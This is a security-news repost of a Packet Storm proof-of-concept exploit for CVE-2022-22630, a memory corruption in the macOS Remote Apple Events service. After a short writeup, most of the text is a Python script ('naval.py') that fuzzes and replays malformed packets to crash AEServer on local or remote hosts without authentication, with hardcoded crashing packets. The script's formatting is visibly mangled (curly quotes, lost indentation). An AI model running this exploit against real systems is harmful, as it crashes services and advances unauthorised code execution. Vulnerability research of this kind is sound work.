Security
Headlines
HeadlinesLatestCVEs

Headline

Apple macOS Remote Events Memory Corruption

This is a proof of concept exploit for the Apple macOS remote events remote memory corruption vulnerability. It serves as a toolkit to help debug and trigger crashes.

Packet Storm
#vulnerability#mac#apple#auth

#!/usr/bin/env python

-- coding: UTF-8 --

naval.py

Apple macOS Remote Events Remote Memory Corruption Vulnerability

Jeremy Brown [jbrown3264/gmail]

=====

Intro

=====

[eppc] Hello from AEServer

Remote Apple Events is a core service and remote system administration and automation

tool for Macs. It can be enabled via System Preferences -> Sharing and listens on

port tcp/3031 and may be used in enterprise environments for remote administration.

Sending malformed packets triggers a crash in the AEServer binary which may allow for

arbitrary code execution on the remote machine within the context of the _eppc user.

However, the crash is subtle as the service is automatically restarted and only a log

in /Library/Logs/DiagnosticReports/AEServer_*.crash is generated if ReportCrash is enabled.

Although a controlled, reliable crash at an arbitrary location is difficult, it was

eventually achieved during testing with repeated characters in packets during sessions.

Thread 0 crashed with X86 Thread State (64-bit):

rax: 0x4242424242424242 rbx: 0x0000000000000006 rcx: 0x0000424242424240 rdx: 0x00000000000e6370

rdi: 0x00007fb041c0ab40 rsi: 0x0000000103d3ba00 rbp: 0x00007ffeebef99f0 rsp: 0x00007ffeebef99b8

r8: 0x0000000000000020 r9: 0x0000000000000002 r10: 0x00007fb041c00000 r11: 0x00007fb041c0e1c0

r12: 0x000000000000000d r13: 0x00007fff8091afe0 r14: 0x00007fb041c251b0 r15: 0x00007fb041c25218

rip: 0x00007fff202d541f rfl: 0x0000000000010202 cr2: 0x0000424242424260

While debugging it looks like the process is crashing when trying to release or

dereference memory that has been deallocated, likely a sign of a heap related bug

such as a use-after-free bug.

This code serves as a toolkit to help debug and trigger crashes, but as mentioned

extensive testing was required to gain more precise control of rax/rcx. Also note

that authentication is not required to trigger crashes service locally or remotely.

=======

Details

=======

Much of the functionality depends on running this locally on the target box, such

as debugging with ReportCrash logs, but it can certainly trigger remote crashes too

if you pass the --remote flag (disables local debugging stuff).

$ ./naval.py 10.0.0.12 --fuzz // use --original to fuzz with the non-crashing packets

$ head crashes.txt

1 - (0x7e @ 1) -> 0x20

[many more truncated]

$ ./naval.py 10.0.0.12 --sleep --replay “1:7e:1” // pkt:byte:index

Then within 10 seconds, start the debugger on the local target… GOGOGO

$ sudo lldb -o “attach --name AEServer” -o c

(lldb) c

Process 50050 resuming

Process 50050 stopped

* thread #1, queue = 'com.apple.main-thread’, stop reason = EXC_BAD_ACCESS (code=1, address=0x7fd1d0e1bd8)

frame #0: 0x00007fff2028341f libobjc.A.dylib`objc_release + 31

And now you can explore the crash

One can also check to see AEServer receving packets:

> dtrace -n ‘syscall::recv:entry { printf("-> %s (pid=%d)", execname, pid); }’ | grep AEServer

===

Fix

===

- Addressed in Monterey 12.3

CVE-2022-22630

import os
import sys
import argparse
import datetime
import time
import psutil
import shutil
import signal
import socket
import random
import re

REPORT_DIR = ‘/Library/Logs/DiagnosticReports’
LOG_DIR = ‘logs’

PORT = 3031 # eppc

CRASH_LOG = ‘crashes’ + str(datetime.datetime.now().strftime(“%Y%m%d_%H%M%S”)) + ‘.txt’
REPORT_CRASH = True
SLEEP_TIME = 10
MAX_BYTE = 255 # 0xff

original packets

PKT_1_ORIG = b’PPCT\x00\x00\x00\x01\x00\x00\x00\x01’
PKT_2_ORIG = b’\xe4LPRT\x01\xe1\x01\xe7\x06finder\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00’
PKT_3_ORIG = b’\xe4SREQ\xdf\xdf\xdf\xdf\xdf\x01\xe7\x06finder\xdf\xdb\xe5\x04B{\xbf\xac\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdc\xe5\x04test\xdf\xdd\x00’
PKT_4_ORIG = b’\x16\x03\x01\x00\x92\x01\x00\x00\x8e\x03\x03\x61\x00\x8b\x66\x96\xc7\x08\xa2\xe8\x0e\x53\x13\xbd\xd3\x1c\x69\x12\x43\xd3\x03\xe2\xec\x8d\x61\x3d\x01\xed\x67\xd7\x62\xf8\xca\x00\x00\x2c\x00\xff\xc0\x2c\xc0\x2b\xc0\x24\xc0\x23\xc0\x0a\xc0\x09\xc0\x08\xc0\x30\xc0\x2f\xc0\x28\xc0\x27\xc0\x14\xc0\x13\xc0\x12\x00\x9d\x00\x9c\x00\x3d\x00\x3c\x00\x35\x00\x2f\x00\x0a\x01\x00\x00\x39\x00\x0a\x00\x08\x00\x06\x00\x17\x00\x18\x00\x19\x00\x0b\x00\x02\x01\x00\x00\x0d\x00\x12\x00\x10\x04\x01\x02\x01\x05\x01\x06\x01\x04\x03\x02\x03\x05\x03\x06\x03\x00\x05\x00\x05\x01\x00\x00\x00\x00\x00\x12\x00\x00\x00\x17\x00\x00’
PKT_5_ORIG = b’\x16\x03\x03\x00\x46\x10\x00\x00\x42\x41\x04\x8d\xd9\xbc\x5f\x9b\x0d\x86\x28\xda\x1f\xba\x75\xe3\x01\x06\x73\xf4\x28\xe2\xe5\x9b\x2e\xfc\x75\x0c\xad\x3d\x7d\xc8\x59\xc0\x20\xce\xcb\xdf\x87\x88\x09\x46\x1f\xf3\x97\x3f\xb8\xd1\xc8\xf5\x4b\xa9\x9f\xdc\xae\xba\x75\x50\xfa\x96\xd5\xcf\xa2\xa4\xec\x7b\x61’

crashing packets

PKT_1 = b’PPCT\x00\x00\x00\x01\x00\x00\x00\x01’
PKT_2 = b’\xe4LPRT\x01\xe1\x01\xe7\x06xxxyyy\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00’ # s/finder/xxxyyy

class Naval(object):
def init(self, args):
self.host = args.host
self.fuzz = args.fuzz
self.replay = args.replay
self.remote = args.remote
self.reprofile = args.reprofile
self.original = args.original
self.sleep = args.sleep

    self.pkt1 = None  
    self.pkt2 = None

    # original  
    self.pkt3 = None  
    self.pkt4 = None  
    self.pkt5 = None

    self.pkt_pick = 0

    self.pkt_num = None  
    self.byte = None  
    self.index = None

    self.logs = []

def run(self):  
    if(self.remote):  
        REPORT_CRASH = False  
    else:  
        REPORT_CRASH = True

    if(REPORT_CRASH):  
        #  
        # sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist  
        #  
        if('ReportCrash' not in (proc.name() for proc in psutil.process_iter())):  
            print("ReportCrash isn't running, make sure it's enabled first\n")  
            return -1

        if(os.path.isdir(REPORT_DIR)):  
            try:  
                logs = os.listdir(REPORT_DIR)  
            except Exception as error:  
                print("failed to list %s: %s\n" % (REPORT_DIR, error))  
                return -1  
        else:  
            print("dir %s doesn't exist, can't fuzz and check for crashes\n" % REPORT_DIR)  
            return -1

    if(self.original):  
        # non-crashing  
        self.pkt1 = PKT_1_ORIG  
        self.pkt2 = PKT_2_ORIG  
        self.pkt3 = PKT_3_ORIG  
        self.pkt4 = PKT_4_ORIG  
        self.pkt5 = PKT_5_ORIG  
    else:  
        # crashing  
        self.pkt1 = PKT_1  
        self.pkt2 = PKT_2

    if(self.replay):  
        if(len(self.replay.split(':')) != 3):  
            print("invalid replay format: %s" % self.replay)  
            return -1

        replay = self.replay.split(':')

        try:  
            self.pkt_num = int(replay[0])  
        except Exception as error:  
            print("packet number %s is invalid: %s", (pkt_num, error))  
            return -1

        try:  
            self.byte = int(replay[1], 16)  
        except Exception as error:  
            print("byte %s is invalid: %s", (byte, error))  
            return -1

        try:  
            self.index = int(replay[2])  
        except Exception as error:  
            print("index %s is invalid: %s", (index, error))  
            return -1

        if(self.pkt_num == 1):  
            pkt = self.modifyPacket(self.pkt1, self.byte, self.index)

            if(pkt == None):  
                return -1  
        elif(self.pkt_num == 2):  
            pkt = self.modifyPacket(self.pkt2, self.byte, self.index)

            if(pkt == None):  
                return -1  
        else:  
            print("pkt number must be 1 or 2")  
            return -1

        print("replaying packets\n")

        self.showRepro(pkt)

    if(self.reprofile):  
        if(self.repro(self.reprofile) < 0):  
            print("failed")  
            return -1

        return 0

    #  
    # fuzz each packet one after another  
    #  
    if(self.fuzz):  
        print("fuzzing sequentially packet 1\n")

        self.pkt_num = 1

        if(self.fuzzPacketSeq(self.pkt1) < 0):  
            print("failed")  
            return -1

        print("fuzzing sequentially packet 2\n")

        self.pkt_num = 2

        if(self.fuzzPacketSeq(self.pkt2) < 0):  
            print("failed")  
            return -1

        if(self.original):  
            self.pkt_num = 3

            if(self.fuzzPacketSeq(self.pkt3) < 0):  
                print("failed")  
                return -1

            self.pkt_num = 4

            if(self.fuzzPacketSeq(self.pkt4) < 0):  
                print("failed")  
                return -1

            self.pkt_num = 5

            if(self.fuzzPacketSeq(self.pkt5) < 0):  
                print("failed")  
                return -1  
    else:  
        if(not self.replay):  
            if(self.original):  
                print("sending original packets for testing\n")  
            else:  
                print("sending packets to trigger crash\n")

                self.showRepro([])

        sock = self.getSock()

        if(sock == None):  
            return -1

        try:  
            sock.connect((self.host, PORT))  
        except Exception as error:  
            print("connect() failed: %s\n" % error)  
            return -1

        if(self.sleep):  
            time.sleep(SLEEP_TIME)

        try:  
            sock.send(self.pkt1)  
            sock.recv(256)  
        except Exception as error:  
            print("failed to send/recv packet 1: %s\n" % error)  
            return -1

        try:  
            sock.send(self.pkt2)  
        except Exception as error:  
            print("failed to send packet 2: %s\n" % error)  
            return -1

        if(self.original):  
            try:  
                sock.send(PKT_3_ORIG)  
            except Exception as error:  
                print("failed to send packet 3: %s\n" % error)  
                return -1

            try:  
                sock.send(PKT_4_ORIG)  
            except Exception as error:  
                print("failed to send packet 4: %s\n" % error)  
                return -1

            try:  
                sock.send(PKT_5_ORIG)  
            except Exception as error:  
                print("failed to send packet 5: %s\n" % error)  
                return -1

        sock.close()

    if(REPORT_CRASH):  
        self.checkReports()

    print("done\n")

    return 0

def getSock(self):  
    try:  
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
        sock.settimeout(1)  
    except Exception as error:  
        print("socket() failed: %s\n" % error)  
        return None

    return sock

def fuzzPacketSeq(self, packet):  
    c = 0  
    i = 0

    #  
    # flip each byte in the packet sequentially from 0 ... 255  
    #  
    while(i < len(packet)):  
        while(c <= MAX_BYTE):  
            pkt = bytearray(packet)

            self.index = i  
            self.byte = c

            orig = pkt[self.index]  
            pkt[self.index] = self.byte

            print("pkt @ index=%d (%s -> %s)" % (self.index, hex(orig), hex(pkt[self.index])))

            sock = self.getSock()

            if(sock == None):  
                return -1

            try:  
                sock.connect((self.host, PORT))  
            except Exception as error:  
                print("connect() failed: %s\n" % error)  
                continue

            if(self.sendPacket(sock, pkt) < 0):  
                print("sendPacket() failed\n")  
                return -1

            sock.close()

            self.showRepro(pkt)

            if(REPORT_CRASH):  
                self.checkReports()

            c += 1

        c = 0  
        i += 1

    return 0

def createPacket(self, pkt_name):  
    n = random.randint(8,4096)

    print("created \\x42 x %d for %s\n" % (n, pkt_name))

    return str.encode('B' * n)

def modifyPacket(self, pkt, byte, index):  
    if((index < 0) or (index >= len(pkt))):  
        print("index must be 0 - %d\n" % (len(pkt)-1))  
        return -1

    pkt = pkt[:index] + bytes([byte]) + pkt[index + 1:]

    return pkt

def sendPacket(self, sock, pkt):  
    try:  
        if(self.pkt_pick == 1):  
            sock.send(pkt)  
        else:  
            sock.send(self.pkt1)

        sock.recv(256)  
    except socket.timeout:  
        print("timed out")  
    except Exception as error:  
        print("send/recv failed for packet #1: %s\n" % error)

    try:  
        if(self.pkt_pick == 2):  
            sock.send(pkt)  
        else:  
            sock.send(self.pkt2)

        if(self.original):  
            sock.recv(256) # not necessary for crashing packets 1 & 2  
    except Exception as error:  
        print("send/recv failed for packet #2: %s\n" % error)

    if(self.original):  
        try:  
            if(self.pkt_pick == 3):  
                sock.send(pkt)  
            else:  
                pick = random.randint(1,2)

                #  
                # pick=1 means self.pkt3 doesn't change  
                #

                if(pick == 2):  
                    self.pkt3 = self.createPacket('pkt3')

                sock.send(self.pkt3)

            sock.recv(256)  
        except Exception as error:  
            print("send/recv failed for packet #3: %s\n" % error)

        try:  
            if(self.pkt_pick == 4):  
                sock.send(pkt)  
            else:  
                pick = random.randint(1,2)

                if(pick == 2):  
                    self.pkt4 = self.createPacket('pkt4')

                sock.send(self.pkt4)

            sock.recv(256)  
        except Exception as error:  
            print("send/recv failed for packet #4: %s\n" % error)

        try:  
            if(self.pkt_pick == 5):  
                sock.send(pkt)  
            else:  
                pick = random.randint(1,2)

                if(pick == 2):  
                    self.pkt5 = self.createPacket('pkt5')

                sock.send(self.pkt5)

            sock.recv(256)  
        except Exception as error:  
            print("send/recv failed for packet #5: %s\n" % error)

    return 0

def repro(self, filename):  
    print("reproing crash with %s\n" % os.path.basename(filename))

    try:  
        with open(filename, 'r') as file:  
            data = file.readlines()  
    except Exception as error:  
        print("failed to read file %s: %s" % (filename, error))  
        return -1

    try:  
        self.pkt1 = bytes.fromhex(data[0].replace('\\x', ''))  
        self.pkt2 = bytes.fromhex(data[1].replace('\\x', ''))

        if(self.original):  
            self.pkt3 = bytes.fromhex(data[2].replace('\\x', ''))  
            self.pkt4 = bytes.fromhex(data[3].replace('\\x', ''))  
            self.pkt5 = bytes.fromhex(data[4].replace('\\x', ''))  
    except Exception as error:  
        print("failed to parse repro: %s" % error)  
        return -1

    sock = self.getSock()

    if(sock == None):  
        return -1

    try:  
        sock.connect((self.host, PORT))  
    except Exception as error:  
        print("connect() failed: %s\n" % error)  
        return -1

    if(self.sleep):  
        time.sleep(SLEEP_TIME)

    try:  
        sock.send(self.pkt1)  
        sock.recv(256)  
    except socket.timeout:  
        print("timed out")  
    except Exception as error:  
        print("send/recv failed for packet #1: %s\n" % error)

    try:  
        sock.send(self.pkt2)

        if(self.original):  
            sock.recv(256) # not necessary for crashing packets 1 & 2  
    except Exception as error:  
        print("send/recv failed for packet #2: %s\n" % error)

    if(self.original):  
        try:  
            sock.send(self.pkt3)  
            sock.recv(256)  
        except Exception as error:  
            print("send/recv failed for packet #3: %s\n" % error)

        try:  
            sock.send(self.pkt4)  
            sock.recv(256)  
        except Exception as error:  
            print("send/recv failed for packet #4: %s\n" % error)

        try:  
            sock.send(self.pkt5)  
            sock.recv(256)  
        except Exception as error:  
            print("send/recv failed for packet #5: %s\n" % error)

    sock.close()

    self.showRepro([])

    if(REPORT_CRASH):  
        self.checkReports()

    print("done\n")

    return 0

def getHex(self, data):  
    return ''.join(f'\\x{byte:02x}' for byte in data)

def printHex(self, data):  
    print(''.join(f'\\x{byte:02x}' for byte in data))

def showRepro(self, pkt):  
    if(len(pkt) == len(self.pkt1)):  
        self.printHex(pkt)  
    else:  
        self.printHex(self.pkt1)

    if(len(pkt) == len(self.pkt2)):  
        self.printHex(pkt)  
    else:  
        self.printHex(self.pkt2)

    if(self.original):  
        if(len(pkt) == len(self.pkt3)):  
            self.printHex(pkt)  
        else:  
            self.printHex(self.pkt3)

        if(len(pkt) == len(self.pkt4)):  
            self.printHex(pkt)  
        else:  
            self.printHex(self.pkt4)

        if(len(pkt) == len(self.pkt5)):  
            self.printHex(pkt)  
        else:  
            self.printHex(self.pkt5)

    print()

    #  
    # restore original packets  
    #  
    self.pkt3 = PKT_3_ORIG  
    self.pkt4 = PKT_4_ORIG  
    self.pkt5 = PKT_5_ORIG

def checkReports(self):  
    time.sleep(2) # make sure ReportCrash has time to do its thing

    try:  
        logs_now = os.listdir(REPORT_DIR)  
    except Exception as error:  
        print("failed to open %s for reading: %s\n" % (REPORT_DIR, error))  
        return -1

    if(len(logs_now) > len(self.logs)):  
        logs_new = list(set(logs_now) - set(self.logs))

        #  
        # if we have new crash logs, grab the pc and correlate it with repro  
        #  
        for log in logs_new:  
            if(log.startswith('AEServer') and log.endswith('.crash')):  
                log_file = REPORT_DIR + os.sep + log

                try:  
                    with open(log_file, 'r') as file:  
                        data = file.read()  
                except Exception as error:  
                    print("failed to read %s: %s\n" % (log, error))  
                    return -1

                pc = re.search('0x(.*)', data)

                if(pc != None):  
                    pc = '0x' + pc.group(1).lstrip('0')  
                else:  
                    print("couldn't get pc from crash log\n")

                print("found crash @ pc=%s\n" % pc)

                #  
                # create a crash log if we're fuzzing or replaying bytes at indices  
                #  
                if(self.fuzz):  
                    crash_info = 'pkt #' + str(self.pkt_num) + ' - (byte=' + hex(self.byte) + ' @ index=' + str(self.index) + ') -> ' + pc + '\n'

                    try:  
                        with open(CRASH_LOG, 'a') as file:  
                            file.write(crash_info)  
                    except Exception as error:  
                        print("failed to write %s: %s\n" % (crash_info, error))  
                        return -1

                if(not os.path.isdir(LOG_DIR)):  
                    try:  
                        os.mkdir(LOG_DIR)  
                    except Exception as error:  
                        print("failed to mkdir %s: %s\n" % (LOG_DIR, error))

                log_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt'

                #  
                # move crash log file  
                #  
                try:  
                    shutil.move(log_file, log_name)  
                except Exception as error:  
                    print("failed to move %s: %s\n" % (log_file, error))  
                    return -1

                ips_file = REPORT_DIR + os.sep + log.split('.')[0] + '.ips'

                ips_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt'

                #  
                # check if there's an associated .ips  
                #  
                if(os.path.isfile(ips_file)):  
                    try:  
                        # shutil.move(ips_file, LOG_DIR)  
                        shutil.move(ips_file, ips_name)  
                    except Exception as error:  
                        print("failed to move %s: %s\n" % (ips_file, error))  
                        return -1

                #  
                # write repro if random fuzzing (no byte/index to replay)  
                #  
                # note: possible bug somewhere preventing pkt 3-5 from saving the correct repro,  
                # (eg. if mutated with B's), so for now we're just extra verbose with output when  
                # mutating packets and stop if pc contains 424242 so we can debug from there  
                #  
                repro_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + pc + '_' + 'repro' + '.txt'

                try:  
                    with open(repro_name, 'w') as file:  
                        file.write(self.getHex(self.pkt1))  
                        file.write('\n')  
                        file.write(self.getHex(self.pkt2))

                        if(self.original):  
                            file.write('\n')  
                            file.write(self.getHex(self.pkt3))  
                            file.write('\n')  
                            file.write(self.getHex(self.pkt4))  
                            file.write('\n')  
                            file.write(self.getHex(self.pkt5))  
                except Exception as error:  
                    print("failed to write %s: %s\n" % (repro_name, error))  
                    return -1

                #  
                # temporary to help triage crashing packets  
                #  
                if('424242' in pc):  
                    self.showRepro([])  
                    sys.exit(0)

                #  
                # reset logs after move  
                #  
                try:  
                    self.logs = os.listdir(REPORT_DIR)  
                except Exception as error:  
                    print("failed to list %s: %s\n" % (REPORT_DIR, error))  
                    return -1

        return 0

def stop(signum, frame):
print()
sys.exit(0)

def arg_parse():
parser = argparse.ArgumentParser()

parser.add_argument("host",  
                    type=str,  
                    help="target listening on eppc port 3031")

parser.add_argument("--fuzz",  
                    "--fuzz",  
                    default=False,  
                    action="store_true",  
                    help="sequentially exhaust bytes in each packet and display crashing PC as available")

parser.add_argument("--remote",  
                    "--remote",  
                    default=False,  
                    action="store_true",  
                    help="target remote hosts and turn disable local debugging support")

parser.add_argument("--replay",  
                    "--replay",  
                    type=str,  
                    help="replay crash with the following format [pkt:byte:index], eg. 2:ff:3")

parser.add_argument("--reprofile",  
                    "--reprofile",  
                    type=str,  
                    help="filename containing packet data on each line to replay (generated by random fuzzing)")

parser.add_argument("--original",  
                    "--original",  
                    default=False,  
                    action="store_true",  
                    help="use the original non-crashing packets")

parser.add_argument("--sleep",  
                    "--sleep",  
                    default=False,  
                    action="store_true",  
                    help="sleep helper for time to lldb attach after launchd creates the AEServer process upon connection (10 secs)")

args = parser.parse_args()

return args

def main():
signal.signal(signal.SIGINT, stop)

args = arg_parse()

nr = Naval(args)

result = nr.run()

if(result > 0):  
    sys.exit(-1)

if(name == 'main'):
main()

Related news

CVE-2022-38108: Published | Zero Day Initiative

SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.

CVE-2022-36957: Published | Zero Day Initiative

SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.

Packet Storm: Latest News

TOR Virtual Network Tunneling Tool 0.4.8.13